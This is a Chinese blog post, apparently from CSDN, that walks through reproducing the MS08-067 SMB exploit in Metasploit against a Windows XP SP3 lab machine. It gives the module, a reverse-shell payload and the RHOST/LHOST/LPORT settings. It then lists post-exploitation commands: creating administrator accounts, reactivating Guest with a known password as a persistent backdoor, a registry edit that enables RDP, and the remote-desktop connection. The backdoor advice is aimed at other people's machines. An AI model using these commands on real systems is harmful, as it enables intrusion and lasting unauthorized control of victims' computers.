漏洞ms08_067的复现

  更换了镜像之后,一切显得理所当然一样,,,这根本不能用于实际,,

  首先是metasploit的使用:

  关于工具的使用,也发现了两种不同的方法,依次列举

  1.0:

  搜索方法:search ms08_067

  可以看到有一个方法

  然后使用这个方法:use exploit/windows/smb/ms08_067_netapi

  然后查看可以应用的payload,就是通常所说的shell code,是一种攻击载荷,常用的类型有开放监听后门,运行某个命令或程序什么的,在这里,选择运行后门,并连接到控制端,set payload generic/shell_reverse_tcp

  通过“show options"可以查看所需要的设置;



  使用" show targets"可以查看渗透攻击模块可以成功攻击的平台;


  在这里我用的镜像是winxp p3 简体中文 所以选择34

  即 设置”set target 34"
  设置攻击目标“set RHOST 目标ip地址”

  设置回传端口"set LPORT 5000"

  设置主机ip" set LHOST 主机ip“

  运行exploit就可以看到成果了


  2.0:

  我从网络上看到的方法,比从书上看到的简单多了,,,真是耽误事,,因为很多步骤重复,我就不赘述了

  首先当然是搜索方法,然后使用方法,查看所需要的配置,配置所要攻击的目标机的ip,接着设置target,完成后输入expolit或run得到一个meterpreter,输入shell就进入了cmd命令行,完成结果和第一个方法完全相同,方法简单很多。

上述的两种方法参照metasploit渗透测试魔鬼训练营和网络上的牛人,,(应该不会算侵权吧。。。)

  接下来就是激动人心的时刻了,既然都能运行shell命令了,还有什么不能干。。。

  查看端口开放情况netstat -an
  新建用户

  1.0

  net user admin(名) 123456(密码) /add

  提升权限net localgroup administrators admin /add 当然也可以提升现有用户的权限
 

  2.0
  首先 C:\>net user guest /active:yes
  将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
  然后 C:\>net user guest 1234
  将Guest的密码改为1234,或者改成你喜欢的密码
  最后 C:\>net localgroup administrators guest /add
  将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策    略的设置,
  可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
  或创建一个组.然后用上面的命令加到管理员里面就可以了。
     开放3389尝试远程连接:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

然后远程连接就行了 kali自带远程连接所需的所有东西,所以都不用下直接rdesktop ip:端口号,就可以连接啦。

Windows的话,运行,mstsc。


删除windowxp用户net user 名 /del;


  

  

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值